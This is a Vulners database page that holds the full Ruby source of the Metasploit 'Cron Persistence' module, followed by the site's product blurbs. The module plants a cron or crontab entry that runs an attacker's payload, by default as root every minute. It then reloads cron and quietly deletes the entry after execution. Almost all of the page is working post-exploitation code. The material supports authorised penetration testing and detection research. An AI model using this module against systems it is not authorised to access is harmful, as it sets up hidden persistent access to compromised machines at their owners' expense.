Vulners
Lucene search
Metasploit Cron Persistence Module
`##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Unix
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Cron Persistence',
'Description' => %q(
This module will create a cron or crontab entry to execute a payload.
The module includes the ability to automatically clean up those entries to prevent multiple executions.
syslog will get a copy of the cron entry.
),
'License' => MSF_LICENSE,
'Author' =>
[
'h00die <[email protected]>'
],
'Platform' => ['unix', 'linux'],
'Targets' =>
[
[ 'Cron', { :path => '/etc/cron.d' } ],
[ 'User Crontab', { :path => '/var/spool/cron' } ],
[ 'System Crontab', { :path => '/etc' } ]
],
'DefaultTarget' => 1,
'Arch' => ARCH_CMD,
'Payload' =>
{
'BadChars' => "#%\x10\x13", # is for comments, % is for newline
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python'
}
},
'DefaultOptions' => { 'WfsDelay' => 90 },
'DisclosureDate' => "Jul 1 1979" # Version 7 Unix release date (first cron implementation)
)
)
register_options(
[
OptString.new('USERNAME', [false, 'User to run cron/crontab as', 'root']),
OptString.new('TIMING', [false, 'cron timing. Changing will require WfsDelay to be adjusted', '* * * * *']),
OptBool.new('CLEANUP', [true, 'delete cron entry after execution', true])
], self.class
)
end
def exploit
# https://gist.github.com/istvanp/310203 for cron regex validator
cron_regex = '(\*|[0-5]?[0-9]|\*\/[0-9]+)\s+'
cron_regex << '(\*|1?[0-9]|2[0-3]|\*\/[0-9]+)\s+'
cron_regex << '(\*|[1-2]?[0-9]|3[0-1]|\*\/[0-9]+)\s+'
cron_regex << '(\*|[0-9]|1[0-2]|\*\/[0-9]+|jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)\s+'
cron_regex << '(\*\/[0-9]+|\*|[0-7]|sun|mon|tue|wed|thu|fri|sat)' # \s*
# cron_regex << '(\*\/[0-9]+|\*|[0-9]+)?'
unless datastore['TIMING'] =~ /#{cron_regex}/
fail_with(Failure::BadConfig, 'Invalid timing format')
end
cron_entry = datastore['TIMING']
if target.name.include? 'User Crontab'
unless user_cron_permission?(datastore['USERNAME'])
fail_with(Failure::NoAccess, 'User denied cron via cron.deny')
end
else
cron_entry += " #{datastore['USERNAME']}"
end
flag = Rex::Text.rand_text_alpha(10)
cron_entry += " #{payload.encoded} ##{flag}" # we add a flag to the end of the entry to potentially delete it later
case target.name
when 'Cron'
our_entry = Rex::Text.rand_text_alpha(10)
write_file("#{target.opts[:path]}/#{our_entry}", "#{cron_entry}\n")
vprint_good("Writing #{cron_entry} to #{target.opts[:path]}/#{our_entry}")
if datastore['CLEANUP']
register_file_for_cleanup("#{target.opts[:path]}/#{our_entry}")
end
when 'System Crontab'
file_to_clean = "#{target.opts[:path]}/crontab"
append_file(file_to_clean, "\n#{cron_entry}\n")
vprint_good("Writing #{cron_entry} to #{file_to_clean}")
when 'User Crontab'
file_to_clean = "#{target.opts[:path]}/crontabs/#{datastore['USERNAME']}"
append_file(file_to_clean, "\n#{cron_entry}\n")
vprint_good("Writing #{cron_entry} to #{file_to_clean}")
# at least on ubuntu, we need to reload cron to get this to work
vprint_status('Reloading cron to pickup new entry')
cmd_exec("service cron reload")
end
print_status("Waiting #{datastore['WfsDelay']}sec for execution")
Rex.sleep(datastore['WfsDelay'].to_i)
# we may need to do some cleanup, no need for cron since that uses file dropper
# we could run this on a on_successful_session, but we want cleanup even if it fails
if file_to_clean && flag && datastore['CLEANUP']
print_status("Removing our cron entry from #{file_to_clean}")
cmd_exec("sed '/#{flag}$/d' #{file_to_clean} > #{file_to_clean}.new")
cmd_exec("mv #{file_to_clean}.new #{file_to_clean}")
# replaced cmd_exec("perl -pi -e 's/.*#{flag}$//g' #{file_to_clean}") in favor of sed
if target.name == 'User Crontab' # make sure we clean out of memory
cmd_exec("service cron reload")
end
end
end
def user_cron_permission?(user)
# double check we're allowed to do cron
# may also be /etc/cron.d/
paths = ['/etc/', '/etc/cron.d/']
paths.each do |path|
cron_auth = read_file("#{path}cron.allow")
if cron_auth
if cron_auth =~ /^ALL$/ || cron_auth =~ /^#{Regexp.escape(user)}$/
vprint_good("User located in #{path}cron.allow")
return true
end
end
cron_auths = read_file("#{path}cron.deny")
if cron_auths && cron_auth =~ /^#{Regexp.escape(user)}$/
vprint_error("User located in #{path}cron.deny")
return false
end
end
# no guidance, so we should be fine
true
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Aug 2016 00:00Current
7.4High risk
Vulners AI Score7.4